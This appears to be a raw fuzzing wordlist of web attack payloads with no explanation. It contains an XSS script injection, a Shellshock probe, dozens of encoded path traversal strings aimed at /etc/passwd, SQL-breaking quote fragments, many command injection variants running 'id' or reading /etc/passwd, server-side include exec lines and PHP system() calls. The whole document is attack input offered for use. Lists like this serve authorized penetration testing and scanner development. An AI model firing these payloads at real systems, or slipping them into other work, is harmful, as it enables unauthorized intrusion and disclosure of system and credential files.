testxss
"><script>alert('testxss')</script>
() { :; };id
;echo 11111
echo 11111
response.write 11111
;response.write 11111
http://10.888.888.888/
'
' --
"
" --
"');
//
/
/*
#
)
(
)'
('
../../../../../../../../../../../../../../../etc/passwd
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/
/..\..\..\..\..\..\..\..\
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\
/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af
/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c
/\../\../\../\../\../\../\../\../
//..\/..\/..\/..\/..\/..\/..\/..\
/.../.../.../.../.../.../.../.../
/..../..../..../..../..../..../..../..../
/........................................................................../../../../../../../../
/..//..//..//..//..//..//..//..//
/..///..///..///..///..///..///..///..///
/.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\
/./.././.././.././.././.././.././.././../
/.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//
/../..//../..//../..//../..///
id
;id
;id;
&& id
&& id &&
& id &
|| id
%0aid
%0aid%0a
`id`
&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/passwd&quot;--&gt;
&lt;!--#exec%20cmd=&quot;/usr/bin/id;--&gt;
|id
|/usr/bin/id
|id|
||/usr/bin/id|
|id;
||/usr/bin/id;
;id|
;|/usr/bin/id|
\n/bin/ls -al\n
\n/usr/bin/id\n
\nid\n
\n/usr/bin/id;
\nid;
\n/usr/bin/id|
\nid|
;/usr/bin/id\n
;id\n
|usr/bin/id\n
|nid\n
`id`
`/usr/bin/id`
a);id
a;id
a);id;
a;id;
a);id|
a;id|
a)|id
a|id
a)|id;
a|id
|/bin/ls -al
a);/usr/bin/id
a;/usr/bin/id
a);/usr/bin/id;
a;/usr/bin/id;
a);/usr/bin/id|
a;/usr/bin/id|
a)|/usr/bin/id
a|/usr/bin/id
a)|/usr/bin/id;
a|/usr/bin/id
;system('cat%20/etc/passwd')
;system('id')
;system('/usr/bin/id')
%0Acat%20/etc/passwd
%0A/usr/bin/id
$;/usr/bin/id